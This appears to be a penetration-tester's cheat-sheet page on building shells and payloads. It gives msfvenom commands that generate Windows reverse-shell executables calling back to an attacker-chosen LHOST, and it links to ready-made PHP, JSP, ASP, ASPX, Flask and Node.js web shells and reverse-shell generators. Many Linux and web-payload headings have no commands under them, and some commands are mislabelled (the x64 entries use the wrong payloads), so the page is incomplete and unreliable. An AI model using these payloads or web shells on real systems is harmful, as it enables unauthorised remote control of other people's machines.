Page cover

Shell and Some Payloads

Payload Structure - msfvenom

-> A staged payload is usually shipped in two parts. The first part contains a small primary payload that will establish a connection, transferring a larger secondary payload with the rest of the shellcode. e.g.

windows/shell_reverse_tcp (stageless)
windows/shell/reverse_tcp (staged)
linux/shell_reverse_tcp (stageless)
linux/shell/reverse_tcp (staged)

Non-Meterpreter Binaries

Windows

.exe x86 staged - msfvenom (Non-Meterpreter)

msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe

.exe x64 staged - msfvenom (Non-Meterpreter)

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

.exe x86 stageless - msfvenom (Non-Meterpreter)

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe

.exe x64 stageless - msfvenom (Non-Meterpreter)

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Linux

.elf x86 staged - msfvenom (Non-Meterpreter)

.elf x64 staged - msfvenom (Non-Meterpreter)

.elf x86 stageless - msfvenom (Non-Meterpreter)

.elf x64 stageless - msfvenom (Non-Meterpreter)

Web Payloads

Java WAR - msfvenom (Non-Meterpreter)

ASP - msfvenom (Non-Meterpreter)

ASPX - msfvenom (Non-Meterpreter)

JSP - msfvenom (Non-Meterpreter)

WAR - msfvenom (Non-Meterpreter)

PHP - msfvenom (Non-Meterpreter) - Reverse Shell

or https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.phparrow-up-right https://raw.githubusercontent.com/Dhayalanb/windows-php-reverse-shell/master/Reverse%20Shell.phparrow-up-right

Web Shells

PHP

JSP

https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmdjsp.jsparrow-up-right

or in kali

ASP

https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/asp/cmd-asp-5.1.asparrow-up-right https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/asp/cmdasp.asparrow-up-right

or in kali

ASPX

https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/asp/cmdasp.aspxarrow-up-right

or in kali

Webshell Infecting views.py - Python (Flask)

https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/webshells/views.pyarrow-up-right

nodejs

https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/webshells/views.jsarrow-up-right

Perl

-> Find and edit

Spawn tty via Python

Spawn an upgraded shell

ctrl + z

tools to make life easier

-> revshell generator https://www.revshells.com/arrow-up-right

-> CyberChef https://gchq.github.io/CyberChef/arrow-up-right

-> urlencoder https://www.urlencoder.org/arrow-up-right

-> octal http://www.unit-conversion.info/texttools/octal/arrow-up-right

-> hex http://www.unit-conversion.info/texttools/octal/arrow-up-right

-> IP converter https://www.silisoftware.com/tools/ipconverter.phparrow-up-right

Last updated